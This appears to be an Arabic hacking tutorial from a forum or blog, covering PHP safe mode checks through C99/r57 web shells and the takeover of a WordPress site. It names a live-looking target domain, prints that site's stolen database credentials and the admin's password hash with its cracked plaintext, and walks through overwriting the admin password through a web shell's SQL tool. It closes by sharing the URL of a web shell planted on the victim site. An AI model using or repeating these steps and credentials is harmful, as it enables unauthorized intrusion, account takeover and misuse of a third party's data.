SPYGO CHBANDAG

ما هو السيف مود safe mode؟!

السيف مود هو نظام حماية في السيرفرات ، يقوم بتفعيله بعض السيرفرات ،

بحيث تقوم بتقييد البرمجيات على السيرفر مثل ال php ، وهو يقوم بحماية السيرفر من استخدام دوال واكواد خطره ، اي انه بمثابة نظام حماية للسيرفرطيب كيف افحص السيف مود اذا شغال او موقف ، يعني اذا on او off ؟

!بسيط جداً ، بإمكانك فحص ذلك عن طريق الشيل ، إما شيل C99 او r57 او اي شيل اخر

، والسييف مود يكون موجود بأعلى الشيل.تجد في الشيل كلمة مكتوبةSafe-mode : او Safe-mode او Safe Modeوبعدها يكون مكتوب اذا السيف مود شغال او غير شغال

وهذه صورة توضح حالة السيف مودصورة تظهر ان السيف مود شغالوهذه صورة بعد تخطي السيف مود وإيقافه ، وهنا يظهر وهو OFFكيف اتخطى السيف مود؟!

لتخطي السيف مود هنالك الكثير من الطرق وسنتعلمها في الدروس القادمة باذن الله.!الى الان انتهى الدرس الى هنا!

رح يتم التطبيق على موقع يستخدم برنامج (سكربت) الشهير ووردبريس WordPress

، ذلك لكونه اكثر السكربتات انتشاراًفي هذا الدرس سوف اشرح من بعد سحب الكونفيق ، يعني انا في الدروس السابقة شرحة بعض الطرق لسحب الكونفيق ، وكذلك سأشرح في الدروس القادمة طرق اخرى لسحب الكونفيق وسحب بيانات الاتصال بالقاعدةارجوا مراجعة الدروس السابقة لان هذا الدرس مبني عليه.!طيب رح يتم التطبيق على هذا الموقع

http://fullyvetted.com

والموقع يستعمل وردبريس ، راجع درس المسارات. ، ورح تعرف مسار الكونفيق حق الموقع.!

طيب بعد سحب الكونفيق رح تلاقي فيها بيانات الاتصال بالقاعدةوانا شرحتها من قبل.!ونحن نحتاج ال اسم القاعدة واسم مستخدم القاعدة وباسوورد والهوستيعني لما تفتح اي كونفيق انت بدك تبحث عن المذكور بالاعلى ، وانا في كونفيق هذا الموقع وجدت التاليكود:

[عرض]define(‘DB_NAME’, ‘xbtudlme_wrdp1’); // The name of the database define(‘DB_USER’, ‘xbtudlme_wrdp1’); // Your MySQL username define(‘DB_PASSWORD’, ‘ZHO4LJpv{027’); // …and password define(‘DB_HOST’, ‘localhost’); // 99% chance you won’t need to change this value

شوف مكتوب db_name وهذه خانة اسم القاعدة ومكتوب db_user وهذه خانة اسم مستخدم القاعدة ويوجد db_password وهذه خانة الباسوورد حق القاعدة ، مع العلم انه اسمائهم ليس اجباري يكونو بهذا الشكل.!

طيب الحين عرفني انه اسم القاعدة هو xbtudlme_wrdp1

و اسم مستخدم القاعدة هو xbtudlme_wrdp1

وكلمة السر للقاعدة هو ZHO4LJpv{027

والمستضيف هو localhost

طيب الحين نروح للشيل حقنا ونضغط على كلمة sql كما في الصورة التاليةوبعدها رح يظهر لك كما في الصورة التاليةقم بتعبئة البيانات كما واضح بالصورة ثم اضغط على Connect ليتم الاتصال بالقاعدةبعدها سوف يظهر لك قاعدة البيانات والجداول الموجودة داخل القاعدة كما في الصورة التالية

اختر الجدول الذي تريد الدخول عليه من بيّن الجداول ، وبما اننا نريد تغير بيانات المدير للدخول الى لوحة التحكم حق الموقع ومن ثم اختراقه ، رح نختار جدول اللي يكون فيه الاعضاء او المدراء الخ..!

بمعنى احنا رح نبحث عن جدول بكون اسمه admin او user او login او admins الخ…! ،

يعني اي جدول تشك فيه انه جدول فيه بيانات تسجيل الدخول ، ادخل عليه من اجل التعديل وفي الوردبريس الشهير يكون الجدول هو wp_users ، نضغط عليه من اجل الدخول عليه يظهر لك الاعضاء الموجودين في الموقع كما في الصورة التالية

نضغط على التعديل من اجل تعديل العضو ، ورح نعدل العضو الاول ، لانه بالعاده بكون هو المدير بالعاده وليس غالباً.!

بعض الضغط على التعديل كما في الصورة في الاعلى ، يظهر لك كما في الصورة التاليةنحن بدنا نعدل كلمة المرور ،

طبعا تقدر تعدل اي شيء ، تقدر مثلاً تعدل الايميل ثم تذهب للموقع وتعمل استرجاع كلمة المرور ،

وكذلك تقدر تعدل كلمة المرور فوراً مثل ما ملاحظ كلمة مرور المدير هي

e72cf84b5f3bfa195da2ec0b5aace442

هل تصدق انه يوجد لشخص كلمة مرور بهذا الطول والتعقيد؟! اكيد لا ،

فهذه كلمة المرور مشفره وكلمة المرور قبل التشفير هي scamperيعني اكتب في جوجل MD5 generator ،

وادخل الى احد مواقع التشفير ، وشفر scamper رح تطلع النتيجة e72cf84b5f3bfa195da2ec0b5aace442

الحين انت تقدر تعدله وتحط كلمة المرور تبعتك مشفره ومن ثم تضغط Confirm ، او تكتبت كلمة المراور حقك مثلاً 123456 وتضغط على السهم اللي جنبه ثم تختار MD5 كما في الصورة التاليةثم نضغط Confirmيفتح لنا صفحة جديدة ، اضغط على Yes

كما في الصورة التاليةالحين تم تغيير البيانات ، وانت الان المديروتقدر الان تدخل على لوحة التحكم عن طريق البياناتبحيث كلمة المرور هي 123456 واسم المدير هو xbtudlmeوندخل على لوحة التحكم عن طريق الرابط التالي وندخل البيانات

http://fullyvetted.com/wp-adminومبروك عليك اختراق المنتدىوهذا شيل على الموقع مني هدية للتجربة ، بتمنى تستعملوه بعقل وما تخترقوا الموقع اللي مرفوع عليه الشيل على شان يستفيدوا الاعضاء اكثرالشيل الجديدhttp://fullyvetted.com/asdely.php

Rejister now

Name(obligatoire)

Email(obligatoire)

Soumettre

Δ